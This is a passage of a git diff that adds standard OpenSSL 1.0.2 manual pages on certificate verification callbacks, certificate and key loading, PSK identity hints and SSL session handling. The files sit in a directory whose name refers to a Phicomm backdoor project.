+B<Server mode:> if the client did not return a certificate, the TLS/SSL
+handshake is immediately terminated with a "handshake failure" alert.
+This flag must be used together with SSL_VERIFY_PEER.
+
+B<Client mode:> ignored
+
+=item SSL_VERIFY_CLIENT_ONCE
+
+B<Server mode:> only request a client certificate on the initial TLS/SSL
+handshake. Do not ask for a client certificate again in case of a
+renegotiation. This flag must be used together with SSL_VERIFY_PEER.
+
+B<Client mode:> ignored
+
+=back
+
+Exactly one of the B<mode> flags SSL_VERIFY_NONE and SSL_VERIFY_PEER must be
+set at any time.
+
+The actual verification procedure is performed either using the built-in
+verification procedure or using another application provided verification
+function set with
+L<SSL_CTX_set_cert_verify_callback(3)|SSL_CTX_set_cert_verify_callback(3)>.
+The following descriptions apply in the case of the built-in procedure. An
+application provided procedure also has access to the verify depth information
+and the verify_callback() function, but the way this information is used
+may be different.
+
+SSL_CTX_set_verify_depth() and SSL_set_verify_depth() set the limit up
+to which depth certificates in a chain are used during the verification
+procedure. If the certificate chain is longer than allowed, the certificates
+above the limit are ignored. Error messages are generated as if these
+certificates would not be present, most likely a
+X509_V_ERR_UNABLE_TO_GET_ISSUER_CERT_LOCALLY will be issued.
+The depth count is "level 0:peer certificate", "level 1: CA certificate",
+"level 2: higher level CA certificate", and so on. Setting the maximum
+depth to 2 allows the levels 0, 1, and 2. The default depth limit is 100,
+allowing for the peer certificate and additional 100 CA certificates.
+
+The B<verify_callback> function is used to control the behaviour when the
+SSL_VERIFY_PEER flag is set. It must be supplied by the application and
+receives two arguments: B<preverify_ok> indicates, whether the verification of
+the certificate in question was passed (preverify_ok=1) or not
+(preverify_ok=0). B<x509_ctx> is a pointer to the complete context used
+for the certificate chain verification.
+
+The certificate chain is checked starting with the deepest nesting level
+(the root CA certificate) and worked upward to the peer's certificate.
+At each level signatures and issuer attributes are checked. Whenever
+a verification error is found, the error number is stored in B<x509_ctx>
+and B<verify_callback> is called with B<preverify_ok>=0. By applying
+X509_CTX_store_* functions B<verify_callback> can locate the certificate
+in question and perform additional steps (see EXAMPLES). If no error is
+found for a certificate, B<verify_callback> is called with B<preverify_ok>=1
+before advancing to the next level.
+
+The return value of B<verify_callback> controls the strategy of the further
+verification process. If B<verify_callback> returns 0, the verification
+process is immediately stopped with "verification failed" state. If
+SSL_VERIFY_PEER is set, a verification failure alert is sent to the peer and
+the TLS/SSL handshake is terminated. If B<verify_callback> returns 1,
+the verification process is continued. If B<verify_callback> always returns
+1, the TLS/SSL handshake will not be terminated with respect to verification
+failures and the connection will be established. The calling process can
+however retrieve the error code of the last verification error using
+L<SSL_get_verify_result(3)|SSL_get_verify_result(3)> or by maintaining its
+own error storage managed by B<verify_callback>.
+
+If no B<verify_callback> is specified, the default callback will be used.
+Its return value is identical to B<preverify_ok>, so that any verification
+failure will lead to a termination of the TLS/SSL handshake with an
+alert message, if SSL_VERIFY_PEER is set.
+
+=head1 BUGS
+
+In client mode, it is not checked whether the SSL_VERIFY_PEER flag
+is set, but whether SSL_VERIFY_NONE is not set. This can lead to
+unexpected behaviour, if the SSL_VERIFY_PEER and SSL_VERIFY_NONE are not
+used as required (exactly one must be set at any time).
+
+The certificate verification depth set with SSL[_CTX]_verify_depth()
+stops the verification at a certain depth. The error message produced
+will be that of an incomplete certificate chain and not
+X509_V_ERR_CERT_CHAIN_TOO_LONG as may be expected.
+
+=head1 RETURN VALUES
+
+The SSL*_set_verify*() functions do not provide diagnostic information.
+
+=head1 EXAMPLES
+
+The following code sequence realizes an example B<verify_callback> function
+that will always continue the TLS/SSL handshake regardless of verification
+failure, if wished. The callback realizes a verification depth limit with
+more informational output.
+
+All verification errors are printed; information about the certificate chain
+is printed on request.
+The example is realized for a server that does allow but not require client
+certificates.
+
+The example makes use of the ex_data technique to store application data
+into/retrieve application data from the SSL structure
+(see L<SSL_get_ex_new_index(3)|SSL_get_ex_new_index(3)>,
+L<SSL_get_ex_data_X509_STORE_CTX_idx(3)|SSL_get_ex_data_X509_STORE_CTX_idx(3)>).
+
+ ...
+ typedef struct {
+   int verbose_mode;
+   int verify_depth;
+   int always_continue;
+ } mydata_t;
+ int mydata_index;
+ ...
+ static int verify_callback(int preverify_ok, X509_STORE_CTX *ctx)
+ {
+    char    buf[256];
+    X509   *err_cert;
+    int     err, depth;
+    SSL    *ssl;
+    mydata_t *mydata;
+
+    err_cert = X509_STORE_CTX_get_current_cert(ctx);
+    err = X509_STORE_CTX_get_error(ctx);
+    depth = X509_STORE_CTX_get_error_depth(ctx);
+
+    /*
+     * Retrieve the pointer to the SSL of the connection currently treated
+     * and the application specific data stored into the SSL object.
+     */
+    ssl = X509_STORE_CTX_get_ex_data(ctx, SSL_get_ex_data_X509_STORE_CTX_idx());
+    mydata = SSL_get_ex_data(ssl, mydata_index);
+
+    X509_NAME_oneline(X509_get_subject_name(err_cert), buf, 256);
+
+    /*
+     * Catch a too long certificate chain. The depth limit set using
+     * SSL_CTX_set_verify_depth() is by purpose set to "limit+1" so
+     * that whenever the "depth>verify_depth" condition is met, we
+     * have violated the limit and want to log this error condition.
+     * We must do it here, because the CHAIN_TOO_LONG error would not
+     * be found explicitly; only errors introduced by cutting off the
+     * additional certificates would be logged.
+     */
+    if (depth > mydata->verify_depth) {
+        preverify_ok = 0;
+        err = X509_V_ERR_CERT_CHAIN_TOO_LONG;
+        X509_STORE_CTX_set_error(ctx, err);
+    } 
+    if (!preverify_ok) {
+        printf("verify error:num=%d:%s:depth=%d:%s\n", err,
+                 X509_verify_cert_error_string(err), depth, buf);
+    }
+    else if (mydata->verbose_mode)
+    {
+        printf("depth=%d:%s\n", depth, buf);
+    }
+
+    /*
+     * At this point, err contains the last verification error. We can use
+     * it for something special
+     */
+    if (!preverify_ok && (err == X509_V_ERR_UNABLE_TO_GET_ISSUER_CERT))
+    {
+      X509_NAME_oneline(X509_get_issuer_name(ctx->current_cert), buf, 256);
+      printf("issuer= %s\n", buf);
+    }
+
+    if (mydata->always_continue)
+      return 1;
+    else
+      return preverify_ok;
+ }
+ ...
+
+ mydata_t mydata;
+
+ ...
+ mydata_index = SSL_get_ex_new_index(0, "mydata index", NULL, NULL, NULL);
+
+ ...
+ SSL_CTX_set_verify(ctx, SSL_VERIFY_PEER|SSL_VERIFY_CLIENT_ONCE,
+                    verify_callback);
+
+ /*
+  * Let the verify_callback catch the verify_depth error so that we get
+  * an appropriate error in the logfile.
+  */
+ SSL_CTX_set_verify_depth(verify_depth + 1);
+
+ /*
+  * Set up the SSL specific data into "mydata" and store it into th SSL
+  * structure.
+  */
+ mydata.verify_depth = verify_depth; ...
+ SSL_set_ex_data(ssl, mydata_index, &mydata);
+					     
+ ...
+ SSL_accept(ssl);	/* check of success left out for clarity */
+ if (peer = SSL_get_peer_certificate(ssl))
+ {
+   if (SSL_get_verify_result(ssl) == X509_V_OK)
+   {
+     /* The client sent a certificate which verified OK */
+   }
+ }
+
+=head1 SEE ALSO
+
+L<ssl(3)|ssl(3)>, L<SSL_new(3)|SSL_new(3)>,
+L<SSL_CTX_get_verify_mode(3)|SSL_CTX_get_verify_mode(3)>,
+L<SSL_get_verify_result(3)|SSL_get_verify_result(3)>,
+L<SSL_CTX_load_verify_locations(3)|SSL_CTX_load_verify_locations(3)>,
+L<SSL_get_peer_certificate(3)|SSL_get_peer_certificate(3)>,
+L<SSL_CTX_set_cert_verify_callback(3)|SSL_CTX_set_cert_verify_callback(3)>,
+L<SSL_get_ex_data_X509_STORE_CTX_idx(3)|SSL_get_ex_data_X509_STORE_CTX_idx(3)>,
+L<SSL_get_ex_new_index(3)|SSL_get_ex_new_index(3)>
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CTX_use_certificate.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CTX_use_certificate.pod
new file mode 100644
index 0000000..80321b8
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CTX_use_certificate.pod
@@ -0,0 +1,165 @@
+=pod
+
+=head1 NAME
+
+SSL_CTX_use_certificate, SSL_CTX_use_certificate_ASN1, SSL_CTX_use_certificate_file, SSL_use_certificate, SSL_use_certificate_ASN1, SSL_use_certificate_file, SSL_CTX_use_certificate_chain_file, SSL_CTX_use_PrivateKey, SSL_CTX_use_PrivateKey_ASN1, SSL_CTX_use_PrivateKey_file, SSL_CTX_use_RSAPrivateKey, SSL_CTX_use_RSAPrivateKey_ASN1, SSL_CTX_use_RSAPrivateKey_file, SSL_use_PrivateKey_file, SSL_use_PrivateKey_ASN1, SSL_use_PrivateKey, SSL_use_RSAPrivateKey, SSL_use_RSAPrivateKey_ASN1, SSL_use_RSAPrivateKey_file, SSL_CTX_check_private_key, SSL_check_private_key - load certificate and key data
+
+=head1 SYNOPSIS
+
+ #include <openssl/ssl.h>
+
+ int SSL_CTX_use_certificate(SSL_CTX *ctx, X509 *x);
+ int SSL_CTX_use_certificate_ASN1(SSL_CTX *ctx, int len, unsigned char *d);
+ int SSL_CTX_use_certificate_file(SSL_CTX *ctx, const char *file, int type);
+ int SSL_use_certificate(SSL *ssl, X509 *x);
+ int SSL_use_certificate_ASN1(SSL *ssl, unsigned char *d, int len);
+ int SSL_use_certificate_file(SSL *ssl, const char *file, int type);
+
+ int SSL_CTX_use_certificate_chain_file(SSL_CTX *ctx, const char *file);
+
+ int SSL_CTX_use_PrivateKey(SSL_CTX *ctx, EVP_PKEY *pkey);
+ int SSL_CTX_use_PrivateKey_ASN1(int pk, SSL_CTX *ctx, unsigned char *d,
+				 long len);
+ int SSL_CTX_use_PrivateKey_file(SSL_CTX *ctx, const char *file, int type);
+ int SSL_CTX_use_RSAPrivateKey(SSL_CTX *ctx, RSA *rsa);
+ int SSL_CTX_use_RSAPrivateKey_ASN1(SSL_CTX *ctx, unsigned char *d, long len);
+ int SSL_CTX_use_RSAPrivateKey_file(SSL_CTX *ctx, const char *file, int type);
+ int SSL_use_PrivateKey(SSL *ssl, EVP_PKEY *pkey);
+ int SSL_use_PrivateKey_ASN1(int pk,SSL *ssl, unsigned char *d, long len);
+ int SSL_use_PrivateKey_file(SSL *ssl, const char *file, int type);
+ int SSL_use_RSAPrivateKey(SSL *ssl, RSA *rsa);
+ int SSL_use_RSAPrivateKey_ASN1(SSL *ssl, unsigned char *d, long len);
+ int SSL_use_RSAPrivateKey_file(SSL *ssl, const char *file, int type);
+
+ int SSL_CTX_check_private_key(const SSL_CTX *ctx);
+ int SSL_check_private_key(const SSL *ssl);
+
+=head1 DESCRIPTION
+
+These functions load the certificates and private keys into the SSL_CTX
+or SSL object, respectively.
+
+The SSL_CTX_* class of functions loads the certificates and keys into the
+SSL_CTX object B<ctx>. The information is passed to SSL objects B<ssl>
+created from B<ctx> with L<SSL_new(3)|SSL_new(3)> by copying, so that
+changes applied to B<ctx> do not propagate to already existing SSL objects.
+
+The SSL_* class of functions only loads certificates and keys into a
+specific SSL object. The specific information is kept, when
+L<SSL_clear(3)|SSL_clear(3)> is called for this SSL object.
+
+SSL_CTX_use_certificate() loads the certificate B<x> into B<ctx>,
+SSL_use_certificate() loads B<x> into B<ssl>. The rest of the
+certificates needed to form the complete certificate chain can be
+specified using the
+L<SSL_CTX_add_extra_chain_cert(3)|SSL_CTX_add_extra_chain_cert(3)>
+function.
+
+SSL_CTX_use_certificate_ASN1() loads the ASN1 encoded certificate from
+the memory location B<d> (with length B<len>) into B<ctx>,
+SSL_use_certificate_ASN1() loads the ASN1 encoded certificate into B<ssl>.
+
+SSL_CTX_use_certificate_file() loads the first certificate stored in B<file>
+into B<ctx>. The formatting B<type> of the certificate must be specified
+from the known types SSL_FILETYPE_PEM, SSL_FILETYPE_ASN1.
+SSL_use_certificate_file() loads the certificate from B<file> into B<ssl>.
+See the NOTES section on why SSL_CTX_use_certificate_chain_file()
+should be preferred.
+
+SSL_CTX_use_certificate_chain_file() loads a certificate chain from 
+B<file> into B<ctx>. The certificates must be in PEM format and must
+be sorted starting with the subject's certificate (actual client or server
+certificate), followed by intermediate CA certificates if applicable, and
+ending at the highest level (root) CA.
+There is no corresponding function working on a single SSL object.
+
+SSL_CTX_use_PrivateKey() adds B<pkey> as private key to B<ctx>.
+SSL_CTX_use_RSAPrivateKey() adds the private key B<rsa> of type RSA
+to B<ctx>. SSL_use_PrivateKey() adds B<pkey> as private key to B<ssl>;
+SSL_use_RSAPrivateKey() adds B<rsa> as private key of type RSA to B<ssl>.
+If a certificate has already been set and the private does not belong
+to the certificate an error is returned. To change a certificate, private
+key pair the new certificate needs to be set with SSL_use_certificate()
+or SSL_CTX_use_certificate() before setting the private key with
+SSL_CTX_use_PrivateKey() or SSL_use_PrivateKey(). 
+
+
+SSL_CTX_use_PrivateKey_ASN1() adds the private key of type B<pk>
+stored at memory location B<d> (length B<len>) to B<ctx>.
+SSL_CTX_use_RSAPrivateKey_ASN1() adds the private key of type RSA
+stored at memory location B<d> (length B<len>) to B<ctx>.
+SSL_use_PrivateKey_ASN1() and SSL_use_RSAPrivateKey_ASN1() add the private
+key to B<ssl>.
+
+SSL_CTX_use_PrivateKey_file() adds the first private key found in
+B<file> to B<ctx>. The formatting B<type> of the certificate must be specified
+from the known types SSL_FILETYPE_PEM, SSL_FILETYPE_ASN1.
+SSL_CTX_use_RSAPrivateKey_file() adds the first private RSA key found in
+B<file> to B<ctx>. SSL_use_PrivateKey_file() adds the first private key found
+in B<file> to B<ssl>; SSL_use_RSAPrivateKey_file() adds the first private
+RSA key found to B<ssl>.
+
+SSL_CTX_check_private_key() checks the consistency of a private key with
+the corresponding certificate loaded into B<ctx>. If more than one
+key/certificate pair (RSA/DSA) is installed, the last item installed will
+be checked. If e.g. the last item was a RSA certificate or key, the RSA
+key/certificate pair will be checked. SSL_check_private_key() performs
+the same check for B<ssl>. If no key/certificate was explicitly added for
+this B<ssl>, the last item added into B<ctx> will be checked.
+
+=head1 NOTES
+  
+The internal certificate store of OpenSSL can hold several private
+key/certificate pairs at a time. The certificate used depends on the
+cipher selected, see also L<SSL_CTX_set_cipher_list(3)|SSL_CTX_set_cipher_list(3)>.
+
+When reading certificates and private keys from file, files of type
+SSL_FILETYPE_ASN1 (also known as B<DER>, binary encoding) can only contain
+one certificate or private key, consequently 
+SSL_CTX_use_certificate_chain_file() is only applicable to PEM formatting.
+Files of type SSL_FILETYPE_PEM can contain more than one item.
+
+SSL_CTX_use_certificate_chain_file() adds the first certificate found
+in the file to the certificate store. The other certificates are added
+to the store of chain certificates using L<SSL_CTX_add1_chain_cert(3)|SSL_CTX_add1_chain_cert(3)>. Note: versions of OpenSSL before 1.0.2 only had a single
+certificate chain store for all certificate types, OpenSSL 1.0.2 and later
+have a separate chain store for each type. SSL_CTX_use_certificate_chain_file() 
+should be used instead of the SSL_CTX_use_certificate_file() function in order
+to allow the use of complete certificate chains even when no trusted CA
+storage is used or when the CA issuing the certificate shall not be added to
+the trusted CA storage.
+
+If additional certificates are needed to complete the chain during the
+TLS negotiation, CA certificates are additionally looked up in the
+locations of trusted CA certificates, see
+L<SSL_CTX_load_verify_locations(3)|SSL_CTX_load_verify_locations(3)>.
+
+The private keys loaded from file can be encrypted. In order to successfully
+load encrypted keys, a function returning the passphrase must have been
+supplied, see
+L<SSL_CTX_set_default_passwd_cb(3)|SSL_CTX_set_default_passwd_cb(3)>.
+(Certificate files might be encrypted as well from the technical point
+of view, it however does not make sense as the data in the certificate
+is considered public anyway.)
+
+=head1 RETURN VALUES
+
+On success, the functions return 1.
+Otherwise check out the error stack to find out the reason.
+
+=head1 SEE ALSO
+
+L<ssl(3)|ssl(3)>, L<SSL_new(3)|SSL_new(3)>, L<SSL_clear(3)|SSL_clear(3)>,
+L<SSL_CTX_load_verify_locations(3)|SSL_CTX_load_verify_locations(3)>,
+L<SSL_CTX_set_default_passwd_cb(3)|SSL_CTX_set_default_passwd_cb(3)>,
+L<SSL_CTX_set_cipher_list(3)|SSL_CTX_set_cipher_list(3)>,
+L<SSL_CTX_set_client_cert_cb(3)|SSL_CTX_set_client_cert_cb(3)>,
+L<SSL_CTX_add_extra_chain_cert(3)|SSL_CTX_add_extra_chain_cert(3)>
+
+=head1 HISTORY
+
+Support for DER encoded private keys (SSL_FILETYPE_ASN1) in
+SSL_CTX_use_PrivateKey_file() and SSL_use_PrivateKey_file() was added
+in 0.9.8 .
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CTX_use_psk_identity_hint.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CTX_use_psk_identity_hint.pod
new file mode 100644
index 0000000..12db0da
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CTX_use_psk_identity_hint.pod
@@ -0,0 +1,106 @@
+=pod
+
+=begin comment
+
+Copyright 2005 Nokia. All rights reserved.
+
+The portions of the attached software ("Contribution") is developed by
+Nokia Corporation and is licensed pursuant to the OpenSSL open source
+license.
+
+The Contribution, originally written by Mika Kousa and Pasi Eronen of
+Nokia Corporation, consists of the "PSK" (Pre-Shared Key) ciphersuites
+support (see RFC 4279) to OpenSSL.
+
+No patent licenses or other rights except those expressly stated in
+the OpenSSL open source license shall be deemed granted or received
+expressly, by implication, estoppel, or otherwise.
+
+No assurances are provided by Nokia that the Contribution does not
+infringe the patent or other intellectual property rights of any third
+party or that the license provides you with all the necessary rights
+to make use of the Contribution.
+
+THE SOFTWARE IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND. IN
+ADDITION TO THE DISCLAIMERS INCLUDED IN THE LICENSE, NOKIA
+SPECIFICALLY DISCLAIMS ANY LIABILITY FOR CLAIMS BROUGHT BY YOU OR ANY
+OTHER ENTITY BASED ON INFRINGEMENT OF INTELLECTUAL PROPERTY RIGHTS OR
+OTHERWISE.
+
+=end comment
+
+=head1 NAME
+
+SSL_CTX_use_psk_identity_hint, SSL_use_psk_identity_hint,
+SSL_CTX_set_psk_server_callback, SSL_set_psk_server_callback - set PSK
+identity hint to use
+
+
+=head1 SYNOPSIS
+
+ #include <openssl/ssl.h>
+
+ int SSL_CTX_use_psk_identity_hint(SSL_CTX *ctx, const char *hint);
+ int SSL_use_psk_identity_hint(SSL *ssl, const char *hint);
+
+ void SSL_CTX_set_psk_server_callback(SSL_CTX *ctx,
+	unsigned int (*callback)(SSL *ssl, const char *identity,
+	unsigned char *psk, int max_psk_len));
+ void SSL_set_psk_server_callback(SSL *ssl,
+	unsigned int (*callback)(SSL *ssl, const char *identity,
+	unsigned char *psk, int max_psk_len));
+
+
+=head1 DESCRIPTION
+
+SSL_CTX_use_psk_identity_hint() sets the given B<NULL>-terminated PSK
+identity hint B<hint> to SSL context object
+B<ctx>. SSL_use_psk_identity_hint() sets the given B<NULL>-terminated
+PSK identity hint B<hint> to SSL connection object B<ssl>. If B<hint>
+is B<NULL> the current hint from B<ctx> or B<ssl> is deleted.
+
+In the case where PSK identity hint is B<NULL>, the server
+does not send the ServerKeyExchange message to the client.
+
+A server application must provide a callback function which is called
+when the server receives the ClientKeyExchange message from the
+client. The purpose of the callback function is to validate the
+received PSK identity and to fetch the pre-shared key used during the
+connection setup phase. The callback is set using functions
+SSL_CTX_set_psk_server_callback() or
+SSL_set_psk_server_callback(). The callback function is given the
+connection in parameter B<ssl>, B<NULL>-terminated PSK identity sent
+by the client in parameter B<identity>, and a buffer B<psk> of length
+B<max_psk_len> bytes where the pre-shared key is to be stored.
+
+
+=head1 RETURN VALUES
+
+SSL_CTX_use_psk_identity_hint() and SSL_use_psk_identity_hint() return
+1 on success, 0 otherwise.
+
+Return values from the server callback are interpreted as follows:
+
+=over 4
+
+=item Z<>0
+
+PSK identity was not found. An "unknown_psk_identity" alert message
+will be sent and the connection setup fails.
+
+=item E<gt>0
+
+PSK identity was found and the server callback has provided the PSK
+successfully in parameter B<psk>. Return value is the length of
+B<psk> in bytes. It is an error to return a value greater than
+B<max_psk_len>.
+
+If the PSK identity was not found but the callback instructs the
+protocol to continue anyway, the callback must provide some random
+data to B<psk> and return the length of the random data, so the
+connection will fail with decryption_error before it will be finished
+completely.
+
+=back
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CTX_use_serverinfo.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CTX_use_serverinfo.pod
new file mode 100644
index 0000000..da7935c
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CTX_use_serverinfo.pod
@@ -0,0 +1,46 @@
+=pod
+
+=head1 NAME
+
+SSL_CTX_use_serverinfo, SSL_CTX_use_serverinfo_file
+
+=head1 SYNOPSIS
+
+ #include <openssl/ssl.h>
+
+ int SSL_CTX_use_serverinfo(SSL_CTX *ctx, const unsigned char *serverinfo,
+                            size_t serverinfo_length);
+
+ int SSL_CTX_use_serverinfo_file(SSL_CTX *ctx, const char *file);
+
+=head1 DESCRIPTION
+
+These functions load "serverinfo" TLS ServerHello Extensions into the SSL_CTX.
+A "serverinfo" extension is returned in response to an empty ClientHello
+Extension.
+
+SSL_CTX_use_serverinfo() loads one or more serverinfo extensions from
+a byte array into B<ctx>.  The extensions must be concatenated into a 
+sequence of bytes.  Each extension must consist of a 2-byte Extension Type, 
+a 2-byte length, and then length bytes of extension_data.
+
+SSL_CTX_use_serverinfo_file() loads one or more serverinfo extensions from
+B<file> into B<ctx>.  The extensions must be in PEM format.  Each extension
+must consist of a 2-byte Extension Type, a 2-byte length, and then length
+bytes of extension_data.  Each PEM extension name must begin with the phrase
+"BEGIN SERVERINFO FOR ".
+
+=head1 NOTES
+
+=head1 RETURN VALUES
+
+On success, the functions return 1.
+On failure, the functions return 0.  Check out the error stack to find out
+the reason.
+
+=head1 SEE ALSO
+
+=head1 HISTORY
+
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_SESSION_free.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_SESSION_free.pod
new file mode 100644
index 0000000..110ec73
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_SESSION_free.pod
@@ -0,0 +1,55 @@
+=pod
+
+=head1 NAME
+
+SSL_SESSION_free - free an allocated SSL_SESSION structure
+
+=head1 SYNOPSIS
+
+ #include <openssl/ssl.h>
+
+ void SSL_SESSION_free(SSL_SESSION *session);
+
+=head1 DESCRIPTION
+
+SSL_SESSION_free() decrements the reference count of B<session> and removes
+the B<SSL_SESSION> structure pointed to by B<session> and frees up the allocated
+memory, if the reference count has reached 0.
+
+=head1 NOTES
+
+SSL_SESSION objects are allocated, when a TLS/SSL handshake operation
+is successfully completed. Depending on the settings, see
+L<SSL_CTX_set_session_cache_mode(3)|SSL_CTX_set_session_cache_mode(3)>,
+the SSL_SESSION objects are internally referenced by the SSL_CTX and
+linked into its session cache. SSL objects may be using the SSL_SESSION object;
+as a session may be reused, several SSL objects may be using one SSL_SESSION
+object at the same time. It is therefore crucial to keep the reference
+count (usage information) correct and not delete a SSL_SESSION object
+that is still used, as this may lead to program failures due to
+dangling pointers. These failures may also appear delayed, e.g.
+when an SSL_SESSION object was completely freed as the reference count
+incorrectly became 0, but it is still referenced in the internal
+session cache and the cache list is processed during a
+L<SSL_CTX_flush_sessions(3)|SSL_CTX_flush_sessions(3)> operation.
+
+SSL_SESSION_free() must only be called for SSL_SESSION objects, for
+which the reference count was explicitly incremented (e.g.
+by calling SSL_get1_session(), see L<SSL_get_session(3)|SSL_get_session(3)>)
+or when the SSL_SESSION object was generated outside a TLS handshake
+operation, e.g. by using L<d2i_SSL_SESSION(3)|d2i_SSL_SESSION(3)>.
+It must not be called on other SSL_SESSION objects, as this would cause
+incorrect reference counts and therefore program failures.
+
+=head1 RETURN VALUES
+
+SSL_SESSION_free() does not provide diagnostic information.
+
+=head1 SEE ALSO
+
+L<ssl(3)|ssl(3)>, L<SSL_get_session(3)|SSL_get_session(3)>,
+L<SSL_CTX_set_session_cache_mode(3)|SSL_CTX_set_session_cache_mode(3)>,
+L<SSL_CTX_flush_sessions(3)|SSL_CTX_flush_sessions(3)>,
+ L<d2i_SSL_SESSION(3)|d2i_SSL_SESSION(3)>
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_SESSION_get_ex_new_index.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_SESSION_get_ex_new_index.pod
new file mode 100644
index 0000000..657cda9
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_SESSION_get_ex_new_index.pod
@@ -0,0 +1,61 @@
+=pod
+
+=head1 NAME
+
+SSL_SESSION_get_ex_new_index, SSL_SESSION_set_ex_data, SSL_SESSION_get_ex_data - internal application specific data functions
+
+=head1 SYNOPSIS
+
+ #include <openssl/ssl.h>
+
+ int SSL_SESSION_get_ex_new_index(long argl, void *argp,
+                CRYPTO_EX_new *new_func,
+                CRYPTO_EX_dup *dup_func,
+                CRYPTO_EX_free *free_func);
+
+ int SSL_SESSION_set_ex_data(SSL_SESSION *session, int idx, void *arg);
+
+ void *SSL_SESSION_get_ex_data(const SSL_SESSION *session, int idx);
+
+ typedef int new_func(void *parent, void *ptr, CRYPTO_EX_DATA *ad,
+                int idx, long argl, void *argp);
+ typedef void free_func(void *parent, void *ptr, CRYPTO_EX_DATA *ad,
+                int idx, long argl, void *argp);
+ typedef int dup_func(CRYPTO_EX_DATA *to, CRYPTO_EX_DATA *from, void *from_d,
+                int idx, long argl, void *argp);
+
+=head1 DESCRIPTION
+
+Several OpenSSL structures can have application specific data attached to them.
+These functions are used internally by OpenSSL to manipulate application
+specific data attached to a specific structure.
+
+SSL_SESSION_get_ex_new_index() is used to register a new index for application
+specific data.
+
+SSL_SESSION_set_ex_data() is used to store application data at B<arg> for B<idx>
+into the B<session> object.
+
+SSL_SESSION_get_ex_data() is used to retrieve the information for B<idx> from
+B<session>.
+
+A detailed description for the B<*_get_ex_new_index()> functionality
+can be found in L<RSA_get_ex_new_index(3)|RSA_get_ex_new_index(3)>.
+The B<*_get_ex_data()> and B<*_set_ex_data()> functionality is described in
+L<CRYPTO_set_ex_data(3)|CRYPTO_set_ex_data(3)>.
+
+=head1 WARNINGS
+
+The application data is only maintained for sessions held in memory. The
+application data is not included when dumping the session with
+i2d_SSL_SESSION() (and all functions indirectly calling the dump functions
+like PEM_write_SSL_SESSION() and PEM_write_bio_SSL_SESSION()) and can
+therefore not be restored.
+
+=head1 SEE ALSO
+
+L<ssl(3)|ssl(3)>,
+L<RSA_get_ex_new_index(3)|RSA_get_ex_new_index(3)>,
+L<CRYPTO_set_ex_data(3)|CRYPTO_set_ex_data(3)>
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_SESSION_get_time.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_SESSION_get_time.pod
new file mode 100644
index 0000000..490337a
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_SESSION_get_time.pod
@@ -0,0 +1,64 @@
+=pod
+
+=head1 NAME
+
+SSL_SESSION_get_time, SSL_SESSION_set_time, SSL_SESSION_get_timeout, SSL_SESSION_set_timeout - retrieve and manipulate session time and timeout settings
+
+=head1 SYNOPSIS
+
+ #include <openssl/ssl.h>
+
+ long SSL_SESSION_get_time(const SSL_SESSION *s);
+ long SSL_SESSION_set_time(SSL_SESSION *s, long tm);
+ long SSL_SESSION_get_timeout(const SSL_SESSION *s);
+ long SSL_SESSION_set_timeout(SSL_SESSION *s, long tm);
+
+ long SSL_get_time(const SSL_SESSION *s);
+ long SSL_set_time(SSL_SESSION *s, long tm);
+ long SSL_get_timeout(const SSL_SESSION *s);
+ long SSL_set_timeout(SSL_SESSION *s, long tm);
+
+=head1 DESCRIPTION
+
+SSL_SESSION_get_time() returns the time at which the session B<s> was
+established. The time is given in seconds since the Epoch and therefore
+compatible to the time delivered by the time() call.
+
+SSL_SESSION_set_time() replaces the creation time of the session B<s> with
+the chosen value B<tm>.
+
+SSL_SESSION_get_timeout() returns the timeout value set for session B<s>
+in seconds.
+
+SSL_SESSION_set_timeout() sets the timeout value for session B<s> in seconds
+to B<tm>.
+
+The SSL_get_time(), SSL_set_time(), SSL_get_timeout(), and SSL_set_timeout()
+functions are synonyms for the SSL_SESSION_*() counterparts.
+
+=head1 NOTES
+
+Sessions are expired by examining the creation time and the timeout value.
+Both are set at creation time of the session to the actual time and the
+default timeout value at creation, respectively, as set by
+L<SSL_CTX_set_timeout(3)|SSL_CTX_set_timeout(3)>.
+Using these functions it is possible to extend or shorten the lifetime
+of the session.
+
+=head1 RETURN VALUES
+
+SSL_SESSION_get_time() and SSL_SESSION_get_timeout() return the currently
+valid values.
+
+SSL_SESSION_set_time() and SSL_SESSION_set_timeout() return 1 on success.
+
+If any of the function is passed the NULL pointer for the session B<s>, 
+0 is returned.
+
+=head1 SEE ALSO
+
+L<ssl(3)|ssl(3)>,
+L<SSL_CTX_set_timeout(3)|SSL_CTX_set_timeout(3)>,
+L<SSL_get_default_timeout(3)|SSL_get_default_timeout(3)>
+
+=cut
